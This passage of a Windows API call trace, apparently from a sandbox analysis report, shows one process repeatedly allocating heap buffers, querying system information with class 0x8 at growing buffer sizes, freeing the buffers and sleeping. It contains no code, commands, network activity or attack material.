lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.690] Sleep (dwMilliseconds=0x110) [0225.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.705] Sleep (dwMilliseconds=0x110) [0225.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.720] Sleep (dwMilliseconds=0x110) [0225.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.755] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.756] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.756] Sleep (dwMilliseconds=0x110) [0225.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.801] Sleep (dwMilliseconds=0x110) [0225.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.849] Sleep (dwMilliseconds=0x110) [0225.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.902] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.902] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.902] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.903] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.903] Sleep (dwMilliseconds=0x110) [0225.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.959] Sleep (dwMilliseconds=0x110) [0226.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.016] Sleep (dwMilliseconds=0x110) [0226.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.117] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.117] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.118] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.118] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.118] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.118] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.118] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.119] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.119] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.120] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.120] Sleep (dwMilliseconds=0x110) [0226.137] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.137] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.137] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.141] Sleep (dwMilliseconds=0x110) [0226.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.537] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.538] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.539] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.539] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.539] Sleep (dwMilliseconds=0x110) [0226.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.614] Sleep (dwMilliseconds=0x110) [0226.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.694] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0226.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.696] Sleep (dwMilliseconds=0x110) [0226.744] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0226.744] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.745] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.745] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0226.745] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.746] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0226.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0226.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0226.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0226.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0226.766] HeapFree (in: 